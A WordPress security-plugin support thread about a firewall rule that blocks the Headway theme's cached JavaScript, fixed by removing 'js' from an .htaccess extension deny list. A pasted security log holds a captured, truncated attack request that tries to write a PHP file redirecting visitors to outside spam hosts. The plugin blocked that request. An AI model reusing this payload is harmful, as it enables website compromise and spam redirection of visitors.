Headway Theme Visual Editor, Slider 403 error

    #5458
    AITpro Admin
    Keymaster

    Issue/Problem:  Unable to access the Headway Theme Visual Editor.  UAEG blocking js scripts that the Headway Theme stores in the WordPress uploads folder – /wp-content/uploads/headway/cache/block-dynamic-js-layout-front_page-8df6f84.js

    Solution:  Go to the B-Core Edit/Upload/Download tab page >>> Click the Your Current Uploads htaccess File tab.  Remove/delete the js file extension from being blocked in the uploads folder by editing the uploads .htaccess file directly and save your changes. The js| code to delete/remove is highlighted in yellow in the example code below.

    # FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
    <FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z|zip)$">
    # deny directives and closing tag that complete this block in the uploads .htaccess file
    Order Allow,Deny
    Deny from all
    </FilesMatch>

    #26785
    John Evans
    Participant

    [Topic has been merged into this relevant Topic]
    I use the Headway Theme and the slider on the homepage isn’t working since installing BPS Pro and I “think” specifically after activating UAEG. Any thoughts on how to fix this? Thanks.

    #26790
    AITpro Admin
    Keymaster

    @ John Evans – This similar/relevant Forum Topic is very old and I updated the Title to include a “Slider” problem.  The new method to fix this problem is to use UAEG Custom Code.  For step #2 below remove/delete:  js| from your UAEG htaccess code after you have copied it to the Custom Code UAEG text box.

    UAEG htaccess File Custom Code Steps
    1. Copy and paste your entire Uploads .htaccess file code from the “Your Current Uploads htaccess File” tab on the htaccess File Editor page into the CUSTOM CODE UAEG text box.
    2. Edit/modify/customize your UAEG htaccess code.
    3. Click the Save UAEG Custom Code button to save your UAEG custom code.
    4. Go to the Security Modes page and click the UAEG BulletProof Mode Activate button.
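As an added example that is not code from this thread or from BPS Pro: a small Python helper that pulls the extension list out of the FilesMatch directive, drops one entry the way steps 1 and 2 above do by hand, and checks which logged request URIs the uploads .htaccess would still deny. The shortened .htaccess excerpt and its Order/Deny body are constructed assumptions, not the plugin's actual file.

```python
import re

# Constructed, shortened excerpt of a BPS Pro UAEG uploads .htaccess block. The
# real file lists far more extensions; the Order/Deny body is an assumption.
UAEG_HTACCESS = r'''
# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(exe|htaccess|html|js|json|php|phtml|pl|py|sql|swf|xml|zip)$">
Order Allow,Deny
Deny from all
</FilesMatch>
'''

FILESMATCH_RE = re.compile(r'<FilesMatch\s+"([^"]+)"\s*>', re.IGNORECASE)

def filesmatch_pattern(htaccess: str) -> str:
    """Return the regex quoted in the first <FilesMatch "..."> directive."""
    m = FILESMATCH_RE.search(htaccess)
    if m is None:
        raise ValueError('no FilesMatch directive found')
    return m.group(1)

def allow_extension(htaccess: str, ext: str) -> str:
    """Drop one whole alternative (e.g. 'js') from the extension list, as the
    manual 'delete js|' edit does; 'jse', 'jsfl' and 'json' stay blocked."""
    old = filesmatch_pattern(htaccess)
    # The entry must sit between ( or | and | or ) to count as a whole alternative.
    new = re.sub(r'(?<=[(|])' + re.escape(ext) + r'\|', '', old)  # first/middle
    new = re.sub(r'\|' + re.escape(ext) + r'(?=\))', '', new)     # last entry
    return htaccess.replace(old, new, 1)

def is_blocked(htaccess: str, request_uri: str,
               uploads_prefix: str = '/wp-content/uploads/') -> bool:
    """Would the uploads .htaccess deny this request URI? The rule governs only
    files under uploads, and FilesMatch tests the file name alone, so the
    '?ver=4.3.1' query string in the logged request never affects the match."""
    path = request_uri.split('?', 1)[0]
    if not path.startswith(uploads_prefix):
        return False
    filename = path.rsplit('/', 1)[-1]
    return re.search(filesmatch_pattern(htaccess), filename) is not None

if __name__ == '__main__':
    # Request URI from the blocked UAEGWR-HPR log entry quoted in this thread.
    headway_js = ('/wp-content/uploads/headway/cache/'
                  'block-dynamic-js-layout-front_page-0b92f3b.js?ver=4.3.1')
    print('before fix:', is_blocked(UAEG_HTACCESS, headway_js))           # True
    fixed = allow_extension(UAEG_HTACCESS, 'js')
    print('after fix :', is_blocked(fixed, headway_js))                   # False
    print('php still :', is_blocked(fixed, '/wp-content/uploads/x.php'))  # True
```

Note that a request outside the uploads folder (such as the blocked /wp-content/plugins/visual-columns/sys.php POST in the log further down) is never governed by this file; that one is stopped by the Root .htaccess rules instead.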

    #26917
    John Evans
    Participant

    [Topic has been merged into this relevant Topic]
    I have two websites that were hacked on GoDaddy Managed WordPress Hosting for clients of mine. Both had file injections in the root folder like marriage.php, setup.php, etc. I actually created new hosting accounts and rebuilt the sites onto the new system. I also decided to install BPS Pro on another site that hasn’t been hacked. I keep getting security logs for all of these sites. I am checking them of course, as I’m trying to learn the plugin and more about the security side (btw, I did my own hosting for 18 years including WP and never had a hacked website until partnering with someone). Anyways, my main question is: what should I do with these logs? Do I ignore them? One, for instance, is a constant attempt to access one of the previously injected files that isn’t there anymore. I’m going to paste some entries from the logs below…

    Also on a separate issue the JTC addon shows in white when hovering instead of black letters or it just isn’t there.

    [403 POST Request: December 5, 2015 - 3:23 pm]
    Event Code: PFWR-PSBR-HPR
    Solution: http://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 77.70.43.79
    Host Name: 77.70.43.79
    SERVER_PROTOCOL: HTTP/1.0
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: POST
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/visual-columns/sys.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
    REQUEST BODY: url=http://tripsbymike.com/wp-content/plugins/visual-columns/sys.php&login=file_put_contents&password=../../../wait.php&re_password=%3C?php%0D%0A@set_time_limit(0);%0D%0A@error_reporting(0);%0D%0A@ini_set('max_execution_time',%200);%0D%0A$links_str%20=%20'http://threivetrack.com/?utm_source=1%26sec=61ee609490%26sleep_id=2224dc49a861;http://omrcc.net/?a=370957%26c=wl_con';%0D%0A%0D%0A$redir_template%20=%20'%3Cmeta%20http-equiv=%22refresh%22%20content=%222;%20url=%25s%22%3E';%0D%0A%0D%0A$links%20=
    
    [403 GET Request: December 3, 2015 - 4:54 pm]
    Event Code: UAEGWR-HPR
    Solution: http://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
    REMOTE_ADDR: 96.10.226.69
    Host Name: rrcs-96-10-226-69.midsouth.biz.rr.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: http://elsfreight.com/
    REQUEST_URI: /wp-content/uploads/headway/cache/block-dynamic-js-layout-front_page-0b92f3b.js?ver=4.3.1
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586

    #26924
    AITpro Admin
    Keymaster

    The first Security Log entry is a blocked hacking attempt.  The second log entry is a known Headway Theme issue/problem.  See this solution in this Forum Topic.  For the JTC issue see this Forum Topic on Go Daddy Managed WordPress Hosting limitations and restrictions:  http://forum.ait-pro.com/forums/topic/gdmw/

    #26925
    John Evans
    Participant

    I copied and pasted the following per your instructions (not sure what I’m supposed to modify) and the system said my uploads folder is now protected but the slider still doesn’t work…
    [default UAEG htaccess file/code deleted]

    #26926
    AITpro Admin
    Keymaster

    Edit your UAEG htaccess code and delete js| from your code.  The example code below shows js| highlighted in yellow.

    <FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">
    # deny directives and closing tag that complete this block in the uploads .htaccess file
    Order Allow,Deny
    Deny from all
    </FilesMatch>

    #26933
    John Evans
    Participant

    Great! It worked but note to others I had to flush the GoDaddy cache to see results. I test these things out of a private browsing window also FYI.  Can you update BPS Pro to do this automatically like you do with some other plugins? Or is there a way to maybe create an export file for the types of sites I build. I’m going to be incorporating this along with GoDaddy Managed into all sites I build unless the client protests.

    #26937
    AITpro Admin
    Keymaster

    You can use the Custom Code Export|Import tools to Export all Root, wp-admin and UAEG code customizations and then Import those customizations into another website.

    #26938
    John Evans
    Participant

    Do you have an option to pay you to include these mods with the pro plugin setup? I use Headway for all sites and it is a fairly widely used framework.

    #26940
    AITpro Admin
    Keymaster

    The “mod” stuff is already available and built-in using the BPS Custom Code feature, which allows you to customize any/all htaccess code any way you would like to customize it for any/all possible needs.  It would not be good coding design to “hard code” something specifically for the Headway Theme.  Also since doing the UAEG htaccess code customization for the Headway Theme only takes a few minutes to complete there is not really any sort of reason to do this any other way.  And of course since you can Export and Import Custom Code then adding your customizations to other sites would take about 1 minute to complete.  If you have a better way of doing this then I am all ears and open to any ideas/suggestions.

    #26941
    John Evans
    Participant

    Not a big deal. Was really just a question and was willing to pay to have it done if needed. I just thought I noticed your plugin automatically adds whitelisting for Gravity Forms, Easy Twitter Widget and a few others so I thought it could do the same for Headway. No big deal honestly.

    #26943
    AITpro Admin
    Keymaster

    Hmm, I didn’t think of that approach from the perspective of how Plugin Firewall AutoPilot Mode automatically creates whitelist rules.  That would actually be smart and flexible design.  I don’t think there is a huge demand for doing the same thing with UAEG as what is being done with Plugin Firewall AutoPilot Mode, but I think that adding something like this to UAEG is very doable anyway.  I have created a Scheduled Task for this, which will go through Review and then, if it passes, will be created/added to BPS Pro.  Personally I think it is a good idea. 😉
